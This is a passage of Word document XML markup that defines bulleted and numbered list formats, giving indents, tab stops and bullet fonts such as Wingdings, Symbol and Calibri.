    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="31889C8C" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=" "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3600"/>
        </w:tabs>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="53E6F142" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=" "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4320"/>
        </w:tabs>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="F6FCD9C8" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=" "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="7CFC7758" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=" "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5760"/>
        </w:tabs>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="DD60494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0354201"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8566F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56474E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B7F24E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104BDE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="916EB750"/>
    <w:lvl w:ilvl="0" w:tplc="3058169C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="BD20F808" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="F2C40BB4" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="4A4838A6" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="AC16615E" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3600"/>
        </w:tabs>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="CE067618" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4320"/>
        </w:tabs>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="E35A77E6" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="41889196" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5760"/>
        </w:tabs>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="B1B049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56646"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="98FA3DDA"/>
    <w:lvl w:ilvl="0" w:tplc="041F0001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="1132F644">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090FFA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="72465704"/>
    <w:lvl w:ilvl="0" w:tplc="C81EB566">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="—"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorHAnsi" w:hAnsi="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285206FC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DC1E0F62"/>
    <w:lvl w:ilvl="0" w:tplc="A5CAA0F6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="525" w:hanging="46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2A165551"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9586C0E4"/>
    <w:lvl w:ilvl="0" w:tplc="695C53BE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="0402F9E4" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="379E2764" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="814CB1C0" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="B19409E2" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3600"/>
        </w:tabs>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="80F47E96" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4320"/>
        </w:tabs>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="CC509D68" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="502C0428" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5760"/>
        </w:tabs>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="F17494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4E21E2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2B3C2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D95983"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="818A09B8"/>
    <w:lvl w:ilvl="0" w:tplc="4A40F04C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="4BAA1E12" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="FC48E432" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="0E227B58" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="6EB46CDA" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3600"/>
        </w:tabs>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="59C44B10" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4320"/>
        </w:tabs>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="2FE0ED9E" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="77DEFAB8" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5760"/>
        </w:tabs>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="FA6494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C3E0A3E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3D705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D636547"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="68D2C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DF726DF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0A3A9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F824305"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8E0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97663D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F29289FA"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="643"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2FCD77C6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5EC2C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00443B0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E4D8E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052764A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7C566562"/>
    <w:lvl w:ilvl="0" w:tplc="DD105B8C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="10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9E607FE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="15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D932D058">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="22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F96FCFA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="30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BC4680DA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="37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C49E75B6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="44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39D4D450">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="51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F88CAD8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="58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843A1E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="66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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="362018E1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6E68E986"/>
    <w:lvl w:ilvl="0" w:tplc="651A07E2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=" "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="A9525430" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=" "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="17489C6E" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=" "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="91C477C2" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=" "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="C87E10A0" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=" "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3600"/>
        </w:tabs>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="335EFF56" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=" "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4320"/>
        </w:tabs>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="4CA0E532" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=" "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="6B1A398A" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=" "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5760"/>
        </w:tabs>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="AFE8F8FA"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37337045"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EB04A0D6"/>
    <w:lvl w:ilvl="0" w:tplc="AD66D01C">
      <w:start w:val="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8014754"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="235E3768"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:b/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1416" w:hanging="6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611C84"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4568345A"/>
    <w:lvl w:ilvl="0" w:tplc="1132F644">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38C06E67"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D3F4D754"/>
    <w:lvl w:ilvl="0" w:tplc="041F0001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="36B41128">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9801A96"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="430C7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1857FF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1E3C2588"/>
    <w:lvl w:ilvl="0" w:tplc="32F68292">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9440C51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7EA8174">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DEA070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B508D7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775CA7A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ED18721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152B918">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87CAD9E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41" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3DE40DA2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7C6235E6"/>
    <w:lvl w:ilvl="0" w:tplc="49B885A8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="E69EE6D4" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="1668E1CC" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="F46EBCCC" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="6D0CD702" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3600"/>
        </w:tabs>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0F68707A" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4320"/>
        </w:tabs>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="8C98095A" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="3216C96C" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5760"/>
        </w:tabs>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
